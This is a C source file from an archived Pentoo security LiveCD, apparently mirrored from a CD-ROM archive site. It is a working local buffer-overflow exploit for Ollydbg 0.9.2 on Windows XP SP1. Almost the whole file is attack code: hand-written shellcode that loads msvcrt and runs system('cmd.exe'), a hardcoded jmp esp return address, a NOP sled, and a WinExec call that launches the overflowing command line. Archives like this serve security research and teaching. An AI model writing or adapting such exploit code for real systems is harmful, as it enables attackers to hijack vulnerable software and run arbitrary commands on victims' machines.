home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / win32-ollyexploit.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  4KB  |  94 lines

---

1. /* Ollydbg 0.9.2 exploit, This can be grabbed from http://sh0dan.org/files/ollyexploit.c
2.    Very lame, just getting the hang of this win32 stuff 
3.    Ollydbg is vulnerable to a buffer overflow when a valid program is passed 
4.    with a large argv[], this made debugging other local overflows, well trouble some
5.    so i thought i'd write a little exploit for it, this is what happens when you have
6.    too much free time... Shellcode is my own, not optimized i need to figure out 
7.    how to push the full msvcrt and cmd.exe string to the stack (i created this shellcode using
8.    visual c++ __asm( so eh. yeh. This exploit will only work on WinXP SP1 due to hardcoding the 
9.    jmpesp in kernel32.dll and the shellcode addresses are hardcoded for xp sp1. 
10.    take a peek at http://sh0dan.org/files/llacmd.txt for win2ksp3 shellcode. 
11.    Ollydbg can be downloaded from: http://home.t-online.de/home/Ollydbg/ if you're curious.
12.    -wire
13.    shouts to my kittens.
14.    */
15. #include <windows.h>
16. #include <stdio.h>
17. #include <string.h>
18. char shellcizode[] = 
19.                      "\x55"                    // push ebp
20.                      "\x8b\xec"                // mov ebp, esp
21.                      "\x53"                    // push ebx
22.                      "\x56"                    // push esi
23.                      "\x57"                    // push edi
24.                      "\x8b\xe5"                // mov esp, ebp                
25.                      "\x55"                    // push ebp
26.                      "\x8b\xec"                // mov ebp, esp
27.                      "\x33\xff"                // xor edi,edi
28.                      "\x57"                    // push edi
29.                      "\x57"                    // push edi
30.                      "\xc6\x45\xf8\x6d"            // mov byte ptr ss:[ebp-8],6d
31.                      "\xc6\x45\xf9\x73"            // mov byte ptr ss:[ebp-7],73
32.                      "\xc6\x45\xfa\x76"            // mov byte ptr ss:[ebp-6],76
33.                      "\xc6\x45\xfb\x63"            // mov byte ptr ss:[ebp-5],63
34.                      "\xc6\x45\xfc\x72"            // mov byte ptr ss:[ebp-4],72
35.                      "\xc6\x45\xfd\x74"            // mov byte ptr ss:[ebp-3],74
36.                      "\xb8\x61\xd9\xe7\x77"         // mov eax,kernel32.loadlibraryA; remember the address is put on inverted...
37.                      "\x50"                    // push eax
38.                      "\x8d\x45\xf8"                // lea eax, dword ptr ss:[ebp-8]
39.                      "\x50"                    // push eax
40.                      "\xff\x55\xf4"                // call dword ptr ss:[ebp-c]
41.                      "\x58"                    // pop eax
42.                      "\x58"                    // pop eax
43.                      "\x58"                    // pop eax
44.                      "\x33\xc0"                // xor eax,eax
45.                      "\x50"                    // push eax
46.                      "\x50"                    // push eax
47.                      "\xc6\x45\xf8\x63"            // mov byte ptr ss:[ebp-8],63
48.                      "\xc6\x45\xf9\x6d"            // mov byte ptr ss:[ebp-7],6d
49.                      "\xc6\x45\xfa\x64"            // mov byte ptr ss:[ebp-6],64
50.                      "\xc6\x45\xfb\x2e"            // mov byte ptr ss:[ebp-5],2e
51.                      "\xc6\x45\xfc\x65"            // mov byte ptr ss:[ebp-4],65
52.                      "\xc6\x45\xfd\x78"            // mov byte ptr ss:[ebp-3],78
53.                      "\xc6\x45\xfe\x65"            // mov byte ptr ss:[ebp-2],65
54.                      "\xb8\x44\x80\xc2\x77"            // mov eax, 77c28044; addy of system() from msvcrt in xp sp1
55.                      "\x50"                    // push eax
56.                      "\x8d\x45\xf8"                // lea eax, dword ptr ss:[ebp-8]
57.                      "\x50"                    // push eax
58.                      "\xff\x55\xf4"                // call dword ptr ss:[ebp-c]
59.                      "\x83\xc4\x04"                // add esp, 04h
60.                      "\x5c"                    // pop esp
61.                      "\xc3";                // ret            we're done!
62.  
63. int main(int argc, char **argv) {
64.     char exp_buff[1024];
65.     int x;
66.     char ollyfile[100];
67.     char hehbuf[200];
68.     DWORD jmpesp = 0x77E9AE59; // from kernel32.dll XP sp1
69.  
70.     if (argc != 2) {
71.         fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
72.         exit(1);
73.     }
74.     strncpy(ollyfile, argv[1], 99);
75.     ollyfile[100] = 0x00;
76.     
77.     x = strlen(ollyfile) * 2; // each character changes where the return is by 2 characters due to it being passed once to
78.                               // call the program and the other for calling itself C:\olly\ollydbg.exe C:\olly\ollydbg.exe ..
79.     memset(exp_buff, 0x90, 1024); //set our buff to nops...
80.     
81.     sprintf(hehbuf, "%s %s ", ollyfile, ollyfile); // C:\ollydbg.exe C:\ollydbg...
82.  
83.     memcpy(exp_buff, hehbuf, strlen(hehbuf)); 
84.  
85.     memcpy(exp_buff+511+x, &jmpesp, 4); // C:\ollydbg.exe C:\ollydbg.exe NOPx511+x
86.  
87.     memcpy(exp_buff+518+x, &shellcizode, 105); // And our shellcode.
88.     exp_buff[700] = 0x00; // null it so we're passing a valid string.
89.     //fprintf(stderr, "%s", exp_buff); //debugging heh
90.     
91.     WinExec(exp_buff, SW_SHOW); //execute....
92.     return(0);
93. }
94.